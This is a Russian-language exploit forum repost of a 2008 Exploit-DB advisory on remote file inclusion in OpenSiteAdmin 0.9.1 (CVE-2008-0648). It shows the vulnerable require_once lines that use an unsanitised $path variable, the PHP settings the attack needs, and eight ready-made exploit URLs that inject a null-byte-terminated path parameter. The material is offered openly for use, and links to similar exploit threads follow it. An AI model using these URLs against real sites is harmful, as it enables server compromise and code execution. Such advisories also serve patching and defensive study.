Exploit OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5068
Проверка EDB
  1. Пройдено
Автор
TRANCEK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0648
Дата публикации
2008-02-06
Код: 
Software Vulnerable:

OpenSiteAdmin 0.9.1 BETA and maybe prior versions.

Vulnerable Code:

-OpenSiteAdmin/indexFooter.php
require_once($path."footer.php");

-OpenSiteAdmin/scripts/classes/DatabaseManager.php
require_once($path."OpenSiteAdmin/include.php");
require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php");

-OpenSiteAdmin/scripts/classes/FieldManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php");
require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php");
.....
..

-OpenSiteAdmin/scripts/classes/Filter.php
require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php");

-OpenSiteAdmin/scripts/classes/Form.php
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php");
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php");

-OpenSiteAdmin/scripts/classes/FormManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Form.php");

-OpenSiteAdmin/scripts/classes/LoginManager.php
require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php");

-OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php
require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php");

Download:
http://sourceforge.net/project/showfiles.php?group_id=213524

Server should have:
    Register Globals: On
    Magic_quotes_gpc: Off

Exploit:

http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00

Greetz:

Members of http://www.p1mp4m.es and http://www.yashira.org

Author:

Trancek

# milw0rm.com [2008-02-06]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion
Ответы
0
Просмотры
254
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Vaidya-Mitra 1.0 - Multiple SQLi
Ответы
0
Просмотры
600
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Thesis Archiving System v1.0 - Multiple-SQLi
Ответы
0
Просмотры
613
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zenphoto 1.6 - Multiple stored XSS
Ответы
0
Просмотры
642
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Ответы
0
Просмотры
572
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
601
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
577
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Bang Resto v1.0 - 'Multiple' SQL Injection
Ответы
0
Просмотры
3K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу